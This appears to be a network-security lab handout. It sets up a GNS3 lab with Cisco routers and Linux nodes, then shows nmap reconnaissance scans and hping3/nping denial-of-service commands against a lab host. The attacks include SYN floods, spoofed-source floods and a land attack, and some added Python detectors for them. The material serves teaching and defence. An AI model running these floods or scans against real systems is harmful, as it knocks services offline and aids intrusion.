
Post on 15-Feb-2022


Cloud Interface Configuration and Internet Connection

Install the tuntap_20150118.pkg package to create the TAP interfaces.

Always launch the application as superuser:

$ sudo /Applications/GNS3.app/Contents/MacOS/GNS3

Set the correct permissions on Mac OS X:

$ sudo chown root /Applications/GNS3.app/Contents/Resources/dynamips*
$ sudo chmod 4755 /Applications/GNS3.app/Contents/Resources/dynamips*

Before launching GNS3, set the correct permissions on the TAP interfaces. The command must be run again after every reboot of the Mac:

$ sudo chown $(id -un):$(id -gn) /dev/tap*

Create the Cloud and associate it with a TAP interface (e.g. /dev/tap0).

Bridge the TAP interface to the active Ethernet port. To do this, create a bridge interface, add the Ethernet interface to it and then add the TAP interface. This must be repeated every time a project containing a cloud node is restarted.

$ sudo ifconfig bridge0 create
$ sudo ifconfig bridge0 addm en0
$ sudo ifconfig bridge0 addm tap0 up

In summary, after loading the project, run this block of commands:

sudo chown $(id -un):$(id -gn) /dev/tap*
sudo ifconfig bridge0 create
sudo ifconfig bridge0 addm en0
sudo ifconfig bridge0 addm tap0 up

The router that faces the Internet must be configured to obtain an IP address automatically (via DHCP), to have the default route assigned dynamically, and to handle NAT towards the TAP interface:

conf t
ip route 0.0.0.0 0.0.0.0 dhcp
int fas 1/1
 ip addr dhcp
 no shut
exit

access-list 1 permit 10.0.0.0 0.255.255.255
access-list 1 permit 172.16.0.0 0.15.255.255
access-list 1 permit 192.168.0.0 0.0.255.255

ip nat inside source list 1 interface fa1/1 overload

int fa 1/0
 ip nat inside
exit
int fa 1/1
 ip nat outside
exit

router rip
 version 2
 network 10.0.0.0
 network 172.16.1.0
 no auto-summary
exit

wr mem
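Which source addresses access-list 1 hands to NAT depends on Cisco wildcard-mask matching, where a 1 bit in the mask means "ignore this bit". The following Python sketch is an added example, not part of the original slides; the function names are hypothetical, and the last two test addresses are constructed.

```python
import ipaddress

# access-list 1 from the router configuration above: (network, wildcard mask)
ACL_1 = [
    ("10.0.0.0", "0.255.255.255"),
    ("172.16.0.0", "0.15.255.255"),
    ("192.168.0.0", "0.0.255.255"),
]

def wildcard_match(addr, network, wildcard):
    """Cisco wildcard semantics: bits set to 1 in the wildcard are ignored."""
    a = int(ipaddress.IPv4Address(addr))
    n = int(ipaddress.IPv4Address(network))
    care = ~int(ipaddress.IPv4Address(wildcard)) & 0xFFFFFFFF
    return (a & care) == (n & care)

def acl_permits(addr, acl=ACL_1):
    """All entries are permits; anything unmatched hits the implicit deny."""
    return any(wildcard_match(addr, net, wc) for net, wc in acl)

def matched_range(network, wildcard):
    """First and last address covered by a contiguous wildcard entry."""
    n = int(ipaddress.IPv4Address(network))
    w = int(ipaddress.IPv4Address(wildcard))
    return (str(ipaddress.IPv4Address(n & ~w & 0xFFFFFFFF)),
            str(ipaddress.IPv4Address(n | w)))

if __name__ == "__main__":
    for net, wc in ACL_1:
        print(net, wc, "->", matched_range(net, wc))
    # Lab hosts from this page, then two constructed addresses outside the ACL.
    for host in ("192.168.1.2", "172.16.1.2", "10.0.0.4", "172.32.0.1", "8.8.8.8"):
        print(host, "translated" if acl_permits(host) else "not translated")
```

The three entries cover exactly the RFC 1918 private ranges, so only lab-internal sources are translated on fa1/1.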

Basic router configuration

R1:

conf t
interface FastEthernet1/0
 ip address 192.168.0.1 255.255.255.0
 duplex auto
 speed auto
exit
interface FastEthernet1/1
 ip address 10.0.0.1 255.255.255.224
 no ip redirects
 duplex auto
 speed auto
exit
router rip
 version 2
 network 10.0.0.0
 network 192.168.0.0
 no auto-summary
exit
wr mem

R2:

conf t
interface FastEthernet1/0
 ip address 172.16.1.1 255.255.255.0
 duplex auto
 speed auto
exit
interface FastEthernet1/1
 ip address 10.0.0.2 255.255.255.224
 no ip redirects
 duplex auto
 speed auto
exit
router rip
 version 2
 network 10.0.0.0
 network 172.16.1.0
 no auto-summary
exit
wr mem

Configuration of each TinyCore Linux node

Add the following commands to the file /opt/bootlocal.sh (executed at boot) on each machine:

Alice

sudo ip addr add 192.168.1.2/24 broadcast 192.168.1.255 dev eth0
sudo ip route add default via 192.168.1.1
sudo echo nameserver 8.8.8.8 > /etc/resolv.conf
sudo echo nameserver 8.8.4.4 >> /etc/resolv.conf
sudo pkill udhcpc

You can work with vi or use cut/paste:

Bob

cat >> /opt/bootlocal.sh
sudo ip addr add 172.16.1.2/24 broadcast 172.16.1.255 dev eth0
sudo ip route add default via 172.16.1.1
sudo echo nameserver 8.8.8.8 > /etc/resolv.conf
sudo echo nameserver 8.8.4.4 >> /etc/resolv.conf
sudo pkill udhcpc
^D

Mallory

cat >> /opt/bootlocal.sh
sudo ip addr add 10.0.0.4/24 broadcast 10.0.0.255 dev eth0
sudo ip route add default via 10.0.0.3
sudo echo nameserver 8.8.8.8 > /etc/resolv.conf
sudo echo nameserver 8.8.4.4 >> /etc/resolv.conf
sudo pkill udhcpc
^D

Back up the configuration:

$ filetool.sh -b

Reboot:

$ reboot

or

$ poweroff

Loading extensions

tce-load -iw nmap
tce-load -iw hping2
tce-load -iw python
tce-load -iw apache2
tce-load -iw inetutils
tce-load -iw make
tce-load -iw compiletc
tce-load -iw libpcap
tce-load -iw libpcap-dev
tce-load -iw openssl-1.0.0-dev

In case of problems:

Edit /opt/tcemirror and insert "http://distro.ibiblio.org/tinycorelinux" on a single line (without the quotes).

Scans

Stealth Scan

# nmap -sS 172.16.1.2

Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2013-11-11 18:10 EST
Interesting ports on victimhost (172.16.1.2):
Not shown: 1674 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
111/tcp  open  rpcbind
957/tcp  open  unknown
3306/tcp open  mysql
8888/tcp open  sun-answerbook
MAC Address: 08:00:27:D9:8E:D7 (Cadmus Computer Systems)

Nmap finished: 1 IP address (1 host up) scanned in 0.383 seconds
You have new mail in /var/spool/mail/root

TCP null scan (passes through firewalls)

# nmap -sN 172.16.1.2

Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2013-11-11 19:01 EST
Interesting ports on victimhost (172.16.1.2):
Not shown: 1674 closed ports
PORT     STATE         SERVICE
22/tcp   open|filtered ssh
80/tcp   open|filtered http
111/tcp  open|filtered rpcbind
957/tcp  open|filtered unknown
3306/tcp open|filtered mysql
8888/tcp open|filtered sun-answerbook
MAC Address: 08:00:27:D9:8E:D7 (Cadmus Computer Systems)

Nmap finished: 1 IP address (1 host up) scanned in 1.584 seconds
You have new mail in /var/spool/mail/root

Portscan via TCP Syn

# nmap -sT 172.16.1.2

Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2013-11-11 18:12 EST
Interesting ports on victimhost (172.16.1.2):
Not shown: 1674 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
111/tcp  open  rpcbind
957/tcp  open  unknown
3306/tcp open  mysql
8888/tcp open  sun-answerbook
MAC Address: 08:00:27:D9:8E:D7 (Cadmus Computer Systems)

Nmap finished: 1 IP address (1 host up) scanned in 0.406 seconds
You have new mail in /var/spool/mail/root

FIN, Null and Xmas Tree Scans [-sF, -sN, -sX]

The example refers to a FIN scan, but changing the option is enough to obtain the other scans.

# nmap -sF 172.16.1.2

Starting Nmap 4.01 at 2006-07-06 17:23 BST
Interesting ports on victimhost (172.16.1.2):
(The 1668 ports scanned but not shown below are in state: closed)
PORT     STATE         SERVICE
21/tcp   open|filtered ftp
22/tcp   open|filtered ssh
631/tcp  open|filtered ipp
6000/tcp open|filtered X11

Nmap finished: 1 IP address (1 host up) scanned in 1.284

Firewall Detection (firewalking)

Determines whether a firewall is protecting a host:

# nmap -sA 172.16.1.2

Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2013-11-11 16:27 EST
All 1680 scanned ports on victimhost (172.16.1.2) are UNfiltered
MAC Address: 08:00:27:D9:8E:D7 (Cadmus Computer Systems)

Nmap finished: 1 IP address (1 host up) scanned in 0.382 seconds
You have new mail in /var/spool/mail/root

Possible alternative:

# nmap -PN 172.16.1.2

Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2013-11-11 16:30 EST
Interesting ports on victimhost (172.16.1.2):
Not shown: 1674 closed ports
PORT     STATE SERVICE
22/tcp   open  ssh
80/tcp   open  http
111/tcp  open  rpcbind
957/tcp  open  unknown
3306/tcp open  mysql
8888/tcp open  sun-answerbook
MAC Address: 08:00:27:D9:8E:D7 (Cadmus Computer Systems)

Nmap finished: 1 IP address (1 host up) scanned in 0.399 seconds
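Seen from the scanned host, the scan types above differ only in the TCP flags of the probe, which is also why null, FIN and Xmas scans can only report "open|filtered" and the ACK scan reports "UNfiltered". The following Python sketch is an added example, not part of the original slides: it labels probes by flag byte, gives the state nmap derives from each reply, and flags sources sweeping many ports. The function names, the min_ports threshold and the SAMPLE records are assumptions made for illustration.

```python
from collections import defaultdict

FIN, SYN, RST, PSH, ACK, URG = 0x01, 0x02, 0x04, 0x08, 0x10, 0x20

def probe_type(flags):
    """Name the nmap scan that sends an unsolicited segment with this flag byte."""
    kinds = {0: "null", FIN: "fin", FIN | PSH | URG: "xmas", ACK: "ack", SYN: "syn"}
    return kinds.get(flags & 0x3F, "other")

def port_state(kind, reply):
    """State nmap reports for a probe, given the reply: "synack", "rst" or None."""
    if kind == "syn":
        return {"synack": "open", "rst": "closed"}.get(reply, "filtered")
    if kind == "ack":
        return "unfiltered" if reply == "rst" else "filtered"
    # null, fin and xmas: an open port stays silent, so silence is ambiguous
    return "closed" if reply == "rst" else "open|filtered"

def find_scanners(packets, min_ports=5):
    """Return {(src, dst, kind): ports probed} for sources sweeping many ports."""
    ports = defaultdict(set)
    for src, dst, dport, flags in packets:
        ports[(src, dst, probe_type(flags))].add(dport)
    return {k: len(p) for k, p in ports.items()
            if k[2] != "other" and len(p) >= min_ports}

# Constructed capture: (src, dst, dport, flags) for segments outside any connection.
SAMPLE = (
    [("10.0.0.4", "172.16.1.2", p, 0) for p in (22, 80, 111, 957, 3306, 8888)]
    + [("10.0.0.4", "172.16.1.2", p, FIN | PSH | URG) for p in range(1, 11)]
    + [("192.168.1.2", "172.16.1.2", 80, SYN)] * 3   # ordinary web client
)

if __name__ == "__main__":
    for (src, dst, kind), n in find_scanners(SAMPLE).items():
        print(f"{src} -> {dst}: {kind} probes to {n} ports")
    print("null scan, no reply:", port_state("null", None))
    print("ack scan, RST reply:", port_state("ack", "rst"))
```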

Check the versions of the services offered on the ports:

# nmap -sV 172.16.1.2

Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2013-11-11 17:48 EST
Interesting ports on victimhost (172.16.1.2):
Not shown: 1674 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 4.3 (protocol 2.0)
80/tcp   open  http    Apache httpd 2.2.3 ((CentOS))
111/tcp  open  rpcbind 2 (rpc #100000)
957/tcp  open  status  1 (rpc #100024)
3306/tcp open  mysql   MySQL (unauthorized)
8888/tcp open  http    lighttpd 1.4.32
MAC Address: 08:00:27:D9:8E:D7 (Cadmus Computer Systems)

Nmap finished: 1 IP address (1 host up) scanned in 12.624 seconds

Determine information about the operating system and the routers traversed

With Nmap, you can detect which OS and version are running on the remote host. To enable OS and version detection, script scanning and traceroute, use the "-A" option with Nmap.

# nmap -A 172.16.1.2

Starting Nmap 4.11 ( http://www.insecure.org/nmap/ ) at 2013-11-11 16:25 EST
Interesting ports on victimhost (172.16.1.2):
Not shown: 1674 closed ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 4.3 (protocol 2.0)
80/tcp   open  http    Apache httpd 2.2.3 ((CentOS))
111/tcp  open  rpcbind 2 (rpc #100000)
957/tcp  open  status  1 (rpc #100024)
3306/tcp open  mysql   MySQL (unauthorized)
8888/tcp open  http    lighttpd 1.4.32
MAC Address: 08:00:27:D9:8E:D7 (Cadmus Computer Systems)
No exact OS matches for host (If you know what OS is running on it, see http://www.insecure.org/cgi-bin/nmap-submit.cgi).
TCP/IP fingerprint:
SInfo(V=4.11%P=i686-redhat-linux-gnu%D=11/11%Tm=52814B66%O=22%C=1%M=080027)
TSeq(Class=TR%IPID=Z%TS=1000HZ)
T1(Resp=Y%DF=Y%W=16A0%ACK=S++%Flags=AS%Ops=MNNTNW)
T2(Resp=N)
T3(Resp=Y%DF=Y%W=16A0%ACK=S++%Flags=AS%Ops=MNNTNW)
T4(Resp=Y%DF=Y%W=0%ACK=O%Flags=R%Ops=)
T5(Resp=Y%DF=Y%W=0%ACK=S++%Flags=AR%Ops=)
T6(Resp=Y%DF=Y%W=0%ACK=O%Flags=R%Ops=)
T7(Resp=Y%DF=Y%W=0%ACK=S++%Flags=AR%Ops=)
PU(Resp=Y%DF=N%TOS=C0%IPLEN=164%RIPTL=148%RID=E%RIPCK=E%UCK=E%ULEN=134%DAT=E)

Uptime 0.169 days (since Mon Nov 11 12:22:15 2013)

Nmap finished: 1 IP address (1 host up) scanned in 22.271 seconds
You have new mail in /var/spool/mail/root

Using scripts for firewalking:

wget http://nmap.org/svn/scripts/firewalk.nse

# nmap --script=firewalk.nse --traceroute --script-args=firewalk.max-probed-ports=7 172.16.1.2

Attacks

# hping3 -c 10000 -d 120 -S -w 64 -p 21 --flood --rand-source 172.16.1.2

HPING victimhost (172.16.1.2): S set, 40 headers + 120 data bytes
hping in flood mode, no replies will be shown
^C
--- victimhost hping statistic ---
1189112 packets transmitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms

Options used:

-c 100000 = Number of packets to send.
-d 120 = Size of each packet that was sent to the target machine.
-S = I am sending SYN packets only.
-w 64 = TCP window size.
-p 21 = Destination port (21 being the FTP port). You can use any port here.
--flood = Sending packets as fast as possible, without taking care to show incoming replies. Flood mode.
--rand-source = Using random source IP addresses. You can also use -a or --spoof to hide hostnames. See MAN page below.
victimhost = Destination IP address or target machine's IP address. You can also use a website name here. In my case it resolves to 127.0.0.1 (as entered in the /etc/hosts file).

SYN flood – DoS using HPING3

root@kali:~# hping3 -S --flood -V 172.16.1.2
using lo, addr: 127.0.0.1, MTU: 65536
HPING victimhost (172.16.1.2): S set, 40 headers + 0 data bytes
hping in flood mode, no replies will be shown
^C
--- victimhost hping statistic ---
746021 packets transmitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms
root@kali:~#

Simple SYN flood with spoofed IP – DoS using HPING3

root@kali:~# hping3 -S -P -U --flood -V --rand-source -p 22 172.16.1.2
using lo, addr: 172.16.1.2, MTU: 65536
HPING victimhost (172.16.1.2): SPU set, 40 headers + 0 data bytes
hping in flood mode, no replies will be shown
^C
--- victimhost hping statistic ---
554220 packets transmitted, 0 packets received, 100% packet loss
round-trip min/avg/max = 0.0/0.0/0.0 ms
root@kali:~#

TCP connect flood – DoS using NPING

root@kali:~# nping --tcp-connect -rate=90000 -c 900000 -q 172.16.1.2
Starting Nping 0.6.46 ( http://nmap.org/nping ) at 2014-08-21 16:20 EST
^C
Max rtt: 7.220ms | Min rtt: 0.004ms | Avg rtt: 1.684ms
TCP connection attempts: 21880 | Successful connections: 5537 | Failed: 16343 (74.69%)
Nping done: 1 IP address pinged in 3.09 seconds
root@kali:~#

Land Attack:

hping3 -V -c 1000000 -d 120 -S -w 64 -p 22 -s 22 --flood -a 172.16.1.2 172.16.1.2

• --flood: send packets as fast as possible. Don't show replies.
• --rand-dest: random destination address mode. See the man page.
• -V: verbose
• -c --count: packet count
• -d --data: data size
• -S --syn: set SYN flag
• -w --win: winsize (default 64)
• -p --destport [+][+]<port>: destination port (default 0), ctrl+z inc/dec
• -s --baseport: base source port (default random)
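On the receiving side, the SYN floods and the land attack above leave distinct traces: a burst of handshakes that are opened but never completed, and segments whose source address and port equal their destination. The following Python detector is an added example, not part of the original slides; the record format, the thresholds and all sample records are assumptions constructed for illustration.

```python
from collections import defaultdict

def detect(packets, window=1.0, syn_threshold=100, max_completed=0.1):
    """Return alerts for (time, src, sport, dst, dport, flags) records.

    flags is a string such as "S", "SPU" or "A"; thresholds are illustrative.
    """
    alerts, land_seen = [], set()
    opened = defaultdict(set)     # (window, dst, dport) -> {(src, sport)} that sent a SYN
    completed = defaultdict(set)  # same key -> clients that sent the final handshake ACK
    for t, src, sport, dst, dport, flags in packets:
        # Land attack: the segment claims to come from the address and port it targets.
        if (src, sport) == (dst, dport) and (dst, dport) not in land_seen:
            land_seen.add((dst, dport))
            alerts.append(("land", dst, dport))
        key = (int(t // window), dst, dport)
        if "S" in flags and "A" not in flags:  # SYN without ACK, including SPU
            opened[key].add((src, sport))
        elif flags == "A" and (src, sport) in opened[key]:
            completed[key].add((src, sport))
    flooded = set()
    for key in sorted(opened):
        _, dst, dport = key
        syns, done = len(opened[key]), len(completed[key])
        # Many handshakes opened in one window and almost none of them completed.
        if syns >= syn_threshold and done <= max_completed * syns \
                and (dst, dport) not in flooded:
            flooded.add((dst, dport))
            sources = len({src for src, _ in opened[key]})
            alerts.append(("syn-flood", dst, dport, sources))
    return alerts

def sample_packets():
    """Constructed records: a spoofed-source flood, normal clients, land segments."""
    victim = "172.16.1.2"
    flood = [(i * 0.004, f"203.0.113.{i + 1}", 1024 + i, victim, 21, "S")
             for i in range(200)]
    normal = []
    for i in range(5):
        normal.append((2 + i * 0.1, "192.168.1.2", 40000 + i, victim, 80, "S"))
        normal.append((2.01 + i * 0.1, "192.168.1.2", 40000 + i, victim, 80, "A"))
    land = [(3 + i * 0.1, victim, 22, victim, 22, "S") for i in range(3)]
    return flood + normal + land

if __name__ == "__main__":
    for alert in detect(sample_packets()):
        print(alert)
```

The source count in the syn-flood alert separates a --rand-source flood (many sources) from a single flooding host (one source, many source ports).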